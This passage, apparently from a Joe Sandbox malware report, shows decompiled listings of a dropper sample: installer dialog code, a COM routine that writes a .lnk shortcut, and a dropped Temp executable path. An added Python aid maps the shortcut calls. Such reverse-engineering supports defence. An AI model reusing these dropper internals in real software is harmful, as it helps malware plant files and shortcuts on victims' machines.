                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                          • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                                          • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                          • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
Uniqueness
• Uniqueness Score: -1.00%
                                          C-Code - Quality: 78%
                                          			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				long _v16;
                                          				long _v20;
                                          				long _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				long _v36;
                                          				char _v40;
                                          				unsigned int _v44;
                                          				signed int _v48;
                                          				WCHAR* _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				WCHAR* _v72;
                                          				void _v76;
                                          				struct HWND__* _v80;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t82;
                                          				long _t87;
                                          				short* _t89;
                                          				void* _t95;
                                          				signed int _t96;
                                          				int _t109;
                                          				signed short _t114;
                                          				signed int _t118;
                                          				struct HWND__** _t122;
                                          				intOrPtr* _t138;
                                          				WCHAR* _t146;
                                          				unsigned int _t150;
                                          				signed int _t152;
                                          				unsigned int _t156;
                                          				signed int _t158;
                                          				signed int* _t159;
                                          				signed int* _t160;
                                          				struct HWND__* _t166;
                                          				struct HWND__* _t167;
                                          				int _t169;
                                          				unsigned int _t197;
                                          
                                          				_t156 = __edx;
                                          				_t82 =  *0x7a0f60;
                                          				_v32 = _t82;
                                          				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                          				if(_a8 == 0x40b) {
                                          					E00405CB2(0x3fb, _t146);
                                          					E004068F5(_t146);
                                          				}
                                          				_t167 = _a4;
                                          				if(_a8 != 0x110) {
                                          					L8:
                                          					if(_a8 != 0x111) {
                                          						L20:
                                          						if(_a8 == 0x40f) {
                                          							L22:
                                          							_v8 = _v8 & 0x00000000;
                                          							_v12 = _v12 & 0x00000000;
                                          							E00405CB2(0x3fb, _t146);
                                          							if(E00406045(_t186, _t146) == 0) {
                                          								_v8 = 1;
                                          							}
                                          							E0040666E(0x79ff58, _t146);
                                          							_t87 = E00406A3B(1);
                                          							_v16 = _t87;
                                          							if(_t87 == 0) {
                                          								L30:
                                          								E0040666E(0x79ff58, _t146);
                                          								_t89 = E00405FE8(0x79ff58);
                                          								_t158 = 0;
                                          								if(_t89 != 0) {
                                          									 *_t89 = 0;
                                          								}
                                          								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                          									goto L35;
                                          								} else {
                                          									_t169 = 0x400;
                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                          									asm("cdq");
                                          									_v48 = _t109;
                                          									_v44 = _t156;
                                          									_v12 = 1;
                                          									goto L36;
                                          								}
                                          							} else {
                                          								_t159 = 0;
                                          								if(0 == 0x79ff58) {
                                          									goto L30;
                                          								} else {
                                          									goto L26;
                                          								}
                                          								while(1) {
                                          									L26:
                                          									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
                                          									if(_t114 != 0) {
                                          										break;
                                          									}
                                          									if(_t159 != 0) {
                                          										 *_t159 =  *_t159 & _t114;
                                          									}
                                          									_t160 = E00405F89(0x79ff58);
                                          									 *_t160 =  *_t160 & 0x00000000;
                                          									_t159 = _t160;
                                          									 *_t159 = 0x5c;
                                          									if(_t159 != 0x79ff58) {
                                          										continue;
                                          									} else {
                                          										goto L30;
                                          									}
                                          								}
                                          								_t150 = _v44;
                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                          								_v44 = _t150 >> 0xa;
                                          								_v12 = 1;
                                          								_t158 = 0;
                                          								__eflags = 0;
                                          								L35:
                                          								_t169 = 0x400;
                                          								L36:
                                          								_t95 = E00404F58(5);
                                          								if(_v12 != _t158) {
                                          									_t197 = _v44;
                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                          										_v8 = 2;
                                          									}
                                          								}
                                          								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
                                          									E00404F40(0x3ff, 0xfffffffb, _t95);
                                          									if(_v12 == _t158) {
                                          										SetDlgItemTextW(_a4, _t169, 0x79ff48);
                                          									} else {
                                          										E00404E77(_t169, 0xfffffffc, _v48, _v44);
                                          									}
                                          								}
                                          								_t96 = _v8;
                                          								 *0x7a8b44 = _t96;
                                          								if(_t96 == _t158) {
                                          									_v8 = E0040140B(7);
                                          								}
                                          								if(( *(_v32 + 0x14) & _t169) != 0) {
                                          									_v8 = _t158;
                                          								}
                                          								E004045EC(0 | _v8 == _t158);
                                          								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
                                          									E00404A14();
                                          								}
                                          								 *0x7a1f78 = _t158;
                                          								goto L53;
                                          							}
                                          						}
                                          						_t186 = _a8 - 0x405;
                                          						if(_a8 != 0x405) {
                                          							goto L53;
                                          						}
                                          						goto L22;
                                          					}
                                          					_t118 = _a12 & 0x0000ffff;
                                          					if(_t118 != 0x3fb) {
                                          						L12:
                                          						if(_t118 == 0x3e9) {
                                          							_t152 = 7;
                                          							memset( &_v76, 0, _t152 << 2);
                                          							_v80 = _t167;
                                          							_v72 = 0x7a1f88;
                                          							_v60 = E00404E11;
                                          							_v56 = _t146;
                                          							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
                                          							_t122 =  &_v80;
                                          							_v64 = 0x41;
                                          							__imp__SHBrowseForFolderW(_t122);
                                          							if(_t122 == 0) {
                                          								_a8 = 0x40f;
                                          							} else {
                                          								__imp__CoTaskMemFree(_t122);
                                          								E00405F3D(_t146);
                                          								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
                                          								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == 0x7b3800) {
                                          									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
                                          									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
                                          										lstrcatW(_t146, 0x7a6a40);
                                          									}
                                          								}
                                          								 *0x7a1f78 =  *0x7a1f78 + 1;
                                          								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                          							}
                                          						}
                                          						goto L20;
                                          					}
                                          					if(_a12 >> 0x10 != 0x300) {
                                          						goto L53;
                                          					}
                                          					_a8 = 0x40f;
                                          					goto L12;
                                          				} else {
                                          					_t166 = GetDlgItem(_t167, 0x3fb);
                                          					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
                                          						E00405F3D(_t146);
                                          					}
                                          					 *0x7a7a78 = _t167;
                                          					SetWindowTextW(_t166, _t146);
                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                          					_push(1);
                                          					E004045CA(_t167);
                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                          					_push(0x14);
                                          					E004045CA(_t167);
                                          					E004045FF(_t166);
                                          					_t138 = E00406A3B(8);
                                          					if(_t138 == 0) {
                                          						L53:
                                          						return E00404631(_a8, _a12, _a16);
                                          					} else {
                                          						 *_t138(_t166, 1);
                                          						goto L8;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404B0A
                                          • SetWindowTextW.USER32 ref: 00404B34
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,007A1F88,00000000,?,?), ref: 00404C22
                                          • lstrcatW.KERNEL32 ref: 00404C2E
                                          • SetDlgItemTextW.USER32 ref: 00404C40
                                            • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
                                            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406958
                                            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406967
                                            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 0040696C
                                            • Part of subcall function 004068F5: CharPrevW.USER32(?,?), ref: 0040697F
                                          • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                                          • MulDiv.KERNEL32 ref: 00404D1E
                                            • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                            • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                                            • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                                          Strings
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: A$C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                          • API String ID: 2624150263-3100334898
                                          • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                          • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                                          • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                          • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
Uniqueness
• Uniqueness Score: -1.00%
                                          C-Code - Quality: 67%
                                          			E004021AA() {
                                          				signed int _t52;
                                          				void* _t56;
                                          				intOrPtr* _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr* _t62;
                                          				intOrPtr* _t64;
                                          				intOrPtr* _t66;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t74;
                                          				intOrPtr* _t76;
                                          				intOrPtr* _t78;
                                          				intOrPtr* _t80;
                                          				void* _t83;
                                          				intOrPtr* _t91;
                                          				signed int _t101;
                                          				signed int _t105;
                                          				void* _t107;
                                          
                                          				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                          				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                          				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                          				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                          				_t52 =  *(_t107 - 0x20);
                                          				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                          				_t101 = _t52 & 0x00008000;
                                          				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                          				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                          				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                          					E00402DA6(0x21);
                                          				}
                                          				_t56 = _t107 + 8;
                                          				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                          				if(_t56 < _t83) {
                                          					L14:
                                          					 *((intOrPtr*)(_t107 - 4)) = 1;
                                          					_push(0xfffffff0);
                                          				} else {
                                          					_t60 =  *((intOrPtr*)(_t107 + 8));
                                          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                          					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                          					if(_t61 >= _t83) {
                                          						_t64 =  *((intOrPtr*)(_t107 + 8));
                                          						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                          						if(_t101 == _t83) {
                                          							_t80 =  *((intOrPtr*)(_t107 + 8));
                                          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                                          						}
                                          						if(_t105 != _t83) {
                                          							_t78 =  *((intOrPtr*)(_t107 + 8));
                                          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                          						}
                                          						_t66 =  *((intOrPtr*)(_t107 + 8));
                                          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                          						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                          						if( *_t91 != _t83) {
                                          							_t76 =  *((intOrPtr*)(_t107 + 8));
                                          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                          						}
                                          						_t68 =  *((intOrPtr*)(_t107 + 8));
                                          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                          						_t70 =  *((intOrPtr*)(_t107 + 8));
                                          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                          						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                          							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                          							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                          						}
                                          						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          					}
                                          					_t62 =  *((intOrPtr*)(_t107 + 8));
                                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                          					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                          						_push(0xfffffff4);
                                          					} else {
                                          						goto L14;
                                          					}
                                          				}
                                          				E00401423();
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
                                          				return 0;
                                          			}

                                          Statement addresses for the listing above (one entry per decompiled statement, in listing order):
                                          0x004021b3, 0x004021bd, 0x004021c7, 0x004021d1, 0x004021dc, 0x004021df, 0x004021f9, 0x004021fc, 0x00402202, 0x00402205, 0x0040220f, 0x00402213, 0x00402213, 0x00402218, 0x00402229, 0x00402231, 0x004022e8, 0x004022e8, 0x004022ef, 0x00402237, 0x00402237, 0x00402246, 0x0040224a, 0x0040224d, 0x00402253, 0x00402261, 0x00402264, 0x00402266, 0x00402271, 0x00402271, 0x00402276, 0x00402278, 0x0040227f, 0x0040227f, 0x00402282, 0x0040228b, 0x0040228e, 0x00402294, 0x00402296, 0x004022a0, 0x004022a0, 0x004022a3, 0x004022ac, 0x004022af, 0x004022b8, 0x004022be, 0x004022c0, 0x004022ce, 0x004022ce, 0x004022d1, 0x004022d7, 0x004022d7, 0x004022da, 0x004022e0, 0x004022e6, 0x004022fb, 0x00000000, 0x00000000, 0x00000000, 0x004022e6, 0x004022f1, 0x00402c2d, 0x00402c39

                                          APIs
                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID:
                                          • API String ID: 542301482-0
                                          • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                          • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                                          • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                          • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%
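Reading aid for the decompiled E004021AA listing above. This is an added example, not part of the Joe Sandbox report and not code recovered from the sample. It encodes two inferences the report does not state: that the GUIDs at 0x4084e4 / 0x4084d4 / 0x4084f4 are CLSID_ShellLink / IID_IShellLinkW / IID_IPersistFile (the shape CoCreateInstance, a run of Set* calls, QueryInterface, then Save with a path and TRUE is the standard .lnk creation sequence), and that the indirect calls `*(*obj + off)` index the documented IShellLinkW and IPersistFile vtables with 4-byte slots, as a 32-bit build would. The packed word at [ebp-0x20] (_t52) is split exactly as the listing splits it; the sample word in `__main__` is constructed, not a value recovered from the report.

```python
"""Resolve the vtable calls and the packed parameter word in E004021AA."""
from typing import Dict, List, NamedTuple, Tuple

IUNKNOWN = ["QueryInterface", "AddRef", "Release"]

# Documented slot order of IShellLinkW (shobjidl.h), IUnknown first.
ISHELLLINKW = IUNKNOWN + [
    "GetPath", "GetIDList", "SetIDList", "GetDescription", "SetDescription",
    "GetWorkingDirectory", "SetWorkingDirectory", "GetArguments",
    "SetArguments", "GetHotkey", "SetHotkey", "GetShowCmd", "SetShowCmd",
    "GetIconLocation", "SetIconLocation", "SetRelativePath", "Resolve",
    "SetPath",
]

# Documented slot order of IPersistFile (objidl.h).
IPERSISTFILE = IUNKNOWN + [
    "GetClassID", "IsDirty", "Load", "Save", "SaveCompleted", "GetCurFile",
]

VTABLES: Dict[str, List[str]] = {
    "IShellLinkW": ISHELLLINKW,
    "IPersistFile": IPERSISTFILE,
}


def vtable_method(interface: str, byte_offset: int) -> str:
    """Turn a decompiler call `*(*obj + off)(obj, ...)` into a method name.

    32-bit build: one 4-byte pointer per slot, so slot = off // 4.
    """
    if byte_offset % 4:
        raise ValueError(f"{byte_offset:#x} is not a 4-byte vtable slot")
    table = VTABLES[interface]
    slot = byte_offset // 4
    if slot >= len(table):
        raise ValueError(f"slot {slot} is past the end of {interface}")
    return table[slot]


class ShortcutParams(NamedTuple):
    icon_index: int     # _t52 & 0xfff          -> SetIconLocation(icon, idx)
    skip_workdir: bool  # _t52 & 0x8000         -> SetWorkingDirectory skipped
    show_cmd: int       # (_t52 >> 12) & 7      -> SetShowCmd, only if non-zero
    hotkey: int         # (_t52 >> 16) & 0xffff -> SetHotkey


def decode_packed_word(word: int) -> ShortcutParams:
    """Split the 32-bit word at [ebp-0x20] the way the listing does."""
    word &= 0xFFFFFFFF
    return ShortcutParams(
        icon_index=word & 0x00000FFF,
        skip_workdir=bool(word & 0x00008000),
        show_cmd=(word >> 12) & 0x7,
        hotkey=(word >> 16) & 0xFFFF,
    )


# (offset, interface, condition) in the order the listing makes the calls.
# Strings are whatever E00402DA6(n) returns for that n; the report does not
# name that helper, so only its argument is recorded here.
CALL_SEQUENCE: List[Tuple[int, str, str]] = [
    (0x00, "IShellLinkW", "always: QueryInterface(IID at 0x4084f4, &persist)"),
    (0x50, "IShellLinkW", "always: string from E00402DA6(0xffffffdf)"),
    (0x24, "IShellLinkW", "only if (word & 0x8000) == 0, string at 0x7b4000"),
    (0x3c, "IShellLinkW", "only if (word >> 12) & 7 != 0"),
    (0x34, "IShellLinkW", "always: (word >> 16) & 0xffff"),
    (0x44, "IShellLinkW", "only if string from E00402DA6(0xffffffcd) is non-empty"),
    (0x2c, "IShellLinkW", "always: string from E00402DA6(2)"),
    (0x1c, "IShellLinkW", "always: string from E00402DA6(0x45)"),
    (0x18, "IPersistFile", "if every HRESULT so far >= 0: Save(E00402DA6(0xfffffff0), TRUE)"),
    (0x08, "IPersistFile", "always: Release"),
    (0x08, "IShellLinkW", "always: Release"),
]


def annotated_call_sequence() -> List[str]:
    """Render the listing's indirect calls with their resolved method names."""
    return [
        f"+{off:#04x} {iface}::{vtable_method(iface, off)}  [{cond}]"
        for off, iface, cond in CALL_SEQUENCE
    ]


if __name__ == "__main__":
    for line in annotated_call_sequence():
        print(line)
    # Constructed sample word: icon index 42, the 0x8000 bit set, show_cmd 7,
    # hotkey 0x0441. Not a value recovered from the report.
    print(decode_packed_word(0x0441F02A))
```

Run it next to the listing: the `+0x50 ... SetPath`, `+0x24 ... SetWorkingDirectory`, `+0x44 ... SetIconLocation` and `+0x18 IPersistFile::Save` lines line up with the calls at 0x00402253 through 0x004022d1, which is what makes this function a shortcut writer rather than the generic COM call the raw listing suggests. The `skip_workdir` bit and the 0x7b4000 string are the two pieces worth pulling from a memory dump when reconstructing what the dropped .lnk points at.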

                                          C-Code - Quality: 39%
                                          			E0040290B(short __ebx, short* __edi) {
                                          				void* _t21;
                                          
                                          				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                          					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                          					_push(_t21 - 0x2b0);
                                          					_push(__edi);
                                          					E0040666E();
                                          				} else {
                                          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                          					 *__edi = __ebx;
                                          					 *((intOrPtr*)(_t21 - 4)) = 1;
                                          				}
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
                                          				return 0;
                                          			}

                                          Statement addresses for the listing above (one entry per decompiled statement, in listing order):
                                          0x00402923, 0x0040293e, 0x00402949, 0x0040294a, 0x00402a94, 0x00402925, 0x00402928, 0x0040292b, 0x0040292e, 0x0040292e, 0x00402c2d, 0x00402c39

                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                          • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                                          • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                          • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                          				struct HWND__* _v8;
                                          				struct HWND__* _v12;
                                          				long _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				signed char* _v32;
                                          				int _v36;
                                          				signed int _v44;
                                          				int _v48;
                                          				signed int* _v60;
                                          				signed char* _v64;
                                          				signed int _v68;
                                          				long _v72;
                                          				void* _v76;
                                          				intOrPtr _v80;
                                          				intOrPtr _v84;
                                          				void* _v88;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t198;
                                          				intOrPtr _t201;
                                          				long _t207;
                                          				signed int _t211;
                                          				signed int _t222;
                                          				void* _t225;
                                          				void* _t226;
                                          				int _t232;
                                          				long _t237;
                                          				long _t238;
                                          				signed int _t239;
                                          				signed int _t245;
                                          				signed int _t247;
                                          				signed char _t248;
                                          				signed char _t254;
                                          				void* _t258;
                                          				void* _t260;
                                          				signed char* _t278;
                                          				signed char _t279;
                                          				long _t284;
                                          				struct HWND__* _t291;
                                          				signed int* _t292;
                                          				int _t293;
                                          				long _t294;
                                          				signed int _t295;
                                          				void* _t297;
                                          				long _t298;
                                          				int _t299;
                                          				signed int _t300;
                                          				signed int _t303;
                                          				signed int _t311;
                                          				signed char* _t319;
                                          				int _t324;
                                          				void* _t326;
                                          
                                          				_t291 = _a4;
                                          				_v12 = GetDlgItem(_t291, 0x3f9);
                                          				_v8 = GetDlgItem(_t291, 0x408);
                                          				_t326 = SendMessageW;
                                          				_v24 =  *0x7a8ac8;
                                          				_v28 =  *0x7a8ab0 + 0x94;
                                          				if(_a8 != 0x110) {
                                          					L23:
                                          					if(_a8 != 0x405) {
                                          						_t301 = _a16;
                                          					} else {
                                          						_a12 = 0;
                                          						_t301 = 1;
                                          						_a8 = 0x40f;
                                          						_a16 = 1;
                                          					}
                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                          						_v16 = _t301;
                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                          							if(( *0x7a8ab9 & 0x00000002) != 0) {
                                          								L41:
                                          								if(_v16 != 0) {
                                          									_t237 = _v16;
                                          									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                          										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                          									}
                                          									_t238 = _v16;
                                          									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                          										_t301 = _v24;
                                          										_t239 =  *(_t238 + 0x5c);
                                          										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                          										} else {
                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                          										}
                                          									}
                                          								}
                                          								goto L48;
                                          							}
                                          							if(_a8 == 0x413) {
                                          								L33:
                                          								_t301 = 0 | _a8 != 0x00000413;
                                          								_t245 = E00404F85(_v8, _a8 != 0x413);
                                          								_t295 = _t245;
                                          								if(_t295 >= 0) {
                                          									_t94 = _v24 + 8; // 0x8
                                          									_t301 = _t245 * 0x818 + _t94;
                                          									_t247 =  *_t301;
                                          									if((_t247 & 0x00000010) == 0) {
                                          										if((_t247 & 0x00000040) == 0) {
                                          											_t248 = _t247 ^ 0x00000001;
                                          										} else {
                                          											_t254 = _t247 ^ 0x00000080;
                                          											if(_t254 >= 0) {
                                          												_t248 = _t254 & 0x000000fe;
                                          											} else {
                                          												_t248 = _t254 | 0x00000001;
                                          											}
                                          										}
                                          										 *_t301 = _t248;
                                          										E0040117D(_t295);
                                          										_a12 = _t295 + 1;
                                          										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
                                          										_a8 = 0x40f;
                                          									}
                                          								}
                                          								goto L41;
                                          							}
                                          							_t301 = _a16;
                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                          								goto L41;
                                          							}
                                          							goto L33;
